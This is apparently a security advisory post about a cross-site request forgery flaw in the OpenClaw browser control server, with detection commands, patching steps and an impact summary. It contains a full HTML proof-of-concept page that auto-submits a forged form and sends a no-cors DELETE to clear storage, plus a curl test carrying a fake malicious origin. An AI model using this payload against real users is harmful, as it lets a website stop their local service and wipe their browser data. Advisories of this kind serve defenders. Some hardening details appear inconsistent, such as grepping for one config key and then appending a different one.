OpenClaw, Cross-Site Request Forgery (CSRF), CVE-2026-XXXX (High)

Listen to this Post

The vulnerability exists because the OpenClaw browser control server binds to loopback (localhost) but fails to validate the Origin or Referer headers of incoming HTTP requests . Browsers inherently permit cross-origin requests to be sent to loopback addresses from malicious external websites. The exposed endpoints that handle state-changing operations (POST/PUT/PATCH/DELETE) lack a CSRF-style guard, meaning they cannot distinguish between a legitimate request originating from the local user interface and a forged request coming from a malicious site the victim visits . An attacker can host a website that, when visited by a victim running an affected OpenClaw instance, triggers unauthorized commands through the victim’s browser. These commands can include opening or closing browser tabs, modifying storage or cookies, or starting/stopping the browser control service itself, effectively allowing a remote attacker to manipulate the victim’s local browser control plane without any explicit validation of the request’s origin .
Platform: OpenClaw (npm)
Version: <= 2026.2.13
Vulnerability: Cross-Site Request Forgery
Severity: High
Date: 2026-02-18

Prediction: Patched 2026-02-14

What Undercode Say:

Analytics

The vulnerability is triggered by a lack of Origin/Referer header validation on loopback-bound mutation endpoints. The following can be used to test if a system is vulnerable by inspecting the server’s behavior.

1. Check current OpenClaw version
openclaw --version
2. Simulate a malicious cross-origin request using curl
(This bypasses browser context but tests endpoint mutability)
curl -X POST http://localhost:PORT/browser/control \
-H "Origin: https://malicious-site.com" \
-H "Referer: https://malicious-site.com/page" \
-d '{"action":"stop"}'
3. Check server logs for accepted cross-origin requests
grep "POST /browser/control" ~/.openclaw/logs/gateway.log | grep "Origin: https://malicious-site.com"

Exploit

A malicious HTML page can be crafted to force the victim’s browser to send unauthorized commands to the local OpenClaw instance.

<!-- Exploit: csrf_openclaw.html -->
<html>
<body>

<h1>Proof of Concept</h1>

<form id="csrf-form" action="http://localhost:PORT/browser/control" method="POST">
<input type="hidden" name="action" value="stop" />
</form>

<script>
// Automatically submit the form
document.getElementById('csrf-form').submit();
// Alternative: Use fetch API for PUT/DELETE
fetch('http://localhost:PORT/browser/storage/clear', {
method: 'DELETE',
mode: 'no-cors', // Forces the request to be sent even without CORS preflight
headers: { 'Origin': 'https://malicious-site.com' }
});
</script>

</body>
</html>

Protection

The primary fix involves validating the Origin and Referer headers to reject any request that originates from a non-loopback context . Additional hardening includes mandatory authentication.

1. Upgrade to the patched version (includes commit b566b09)
npm install -g openclaw@latest
2. Verify the fix is applied (check for Origin validation in config)
grep "originValidation" ~/.openclaw/config.yaml || echo "strict_origin: true" >> ~/.openclaw/config.yaml
3. Enable mandatory authentication (auto-generated token in new versions)
openclaw config set auth.required true
openclaw config set auth.token "$(openssl rand -hex 32)"
4. Restart the service to apply changes
systemctl --user restart openclaw-gateway

Impact

A successful exploit allows a malicious website to perform unauthorized state-changing operations on the victim’s local OpenClaw browser control plane without user interaction . This includes the ability to open or close browser tabs, modify stored cookies and local storage, and start or stop the browser control service itself . By chaining this with other vulnerabilities (such as token leakage), an attacker could escalate this to remote code execution on the host system . The attack is zero-click; simply visiting a malicious website is sufficient to trigger the exploit .

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top